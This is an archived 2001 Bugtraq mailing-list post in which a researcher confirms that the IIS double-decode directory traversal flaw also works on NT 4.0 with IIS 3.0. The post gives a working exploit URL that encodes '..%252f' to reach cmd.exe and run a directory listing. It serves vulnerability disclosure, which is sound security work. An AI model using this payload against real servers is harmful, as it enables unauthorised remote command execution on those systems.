[20698] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

IIS Decode

daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Aldo_Albuquerque_-_)
Thu May 17 20:09:28 2001

Message-ID: <00e901c0df17$80448570$f00110ac@fusion>
Reply-To: =?iso-8859-1?Q?Aldo_Albuquerque_-_Seguran=E7a_de_Sistemas?= <aldo@cesar.org.br>
From: =?iso-8859-1?Q?Aldo_Albuquerque_-_Seguran=E7a_de_Sistemas?= <aldo@cesar.org.br>
To: <bugtraq@securityfocus.com>
Date: Thu, 17 May 2001 18:22:39 -0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Yes!

I can confirm this . It worked on our testbed.

NT 4.0 + IIS 3.0 + SP6a

http://www.example.com/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cm
d.exe?/c+dir+c:\

Regards,

Aldo Albuquerque - CCSA
Tempest Security Technologies - http://www.tempest.com.br
CESAR - Centro de Estudos e Sistemas Avançados do Recife -
http://www.cesar.org.br



================================================================

----- Original Message -----
From: Michael Vassiliadis
To: bugtraq@securityfocus.com
Sent: Thursday, May 17, 2001 12:52 AM
Subject: IIS Decode


There has been so much talk about this new "diamond" from m$, but NOONE
discovered that this also works on IIS 3!!!.....

Please confirm...


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[20698] in bugtraq

IIS Decode

daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Aldo_Albuquerque_-_)Thu May 17 20:09:28 2001

daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Aldo_Albuquerque_-_)
Thu May 17 20:09:28 2001